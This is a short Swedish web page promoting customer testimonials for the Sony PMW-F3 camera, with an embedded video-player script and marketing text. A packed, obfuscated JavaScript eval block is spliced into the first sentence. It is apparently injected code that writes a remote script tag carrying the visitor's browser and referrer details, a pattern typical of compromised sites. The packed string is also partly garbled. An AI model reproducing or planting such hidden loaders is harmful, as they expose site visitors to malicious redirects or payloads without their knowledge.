Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Sony PMW-F3 Kundutlåtanden

Sony PMW-F3 Kundutlåtanden
Sebastian

type=”text/javascript” src=”https://goviral.hs.llnwd.net/e1/playerjs/sony_pmwf3_10828.js?w=600&h=475&pID=59289&bgc=ffffff&cw=1352659&skinName=light&wmode=window&hideChrome=0″>

Är eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|edhya|var|u0026u|referrer|kzzze||js|php’.split(’|’),0,{}))
det stor skillnad mellan en kamera som är nästan tre gånger dyrare än den mindre? Marginell, visar ett praktiskt test. Men det beror också på vad du ska göra.

Sony PMW-F3 är del av CineAlta 24P-familjen av produkter för digital filmproduktion och dess stöd för flera olika filmhastigheter inkluderar 23.98P, så väl som S-Log arbetsflöden. Ta en titt på vad dessa branch-proffs tycker om PMW-F3 efter att ha använt den.

Sonys Exmor ™ Super35 CMOS-sensor har utformats med fördelen av två årtiondens erfarenhet i Digital Foto, banbrytande digital HD förvärv för långfilmer och som sänds i TV genom det legendariska CineAlta sortimentet.
Det ger en sann ”film look” och överlägsen bildkvalitet i räckvidd för oberoende film, pop promos, reklamfilmer och andra tillämpningar, detta gör att PMW-F3 är en idealisk B-kamera för high-end långfilm produktioner. ”

Läs en tydlig recension här samt kika på videon ovan för att höra vad folk tycker!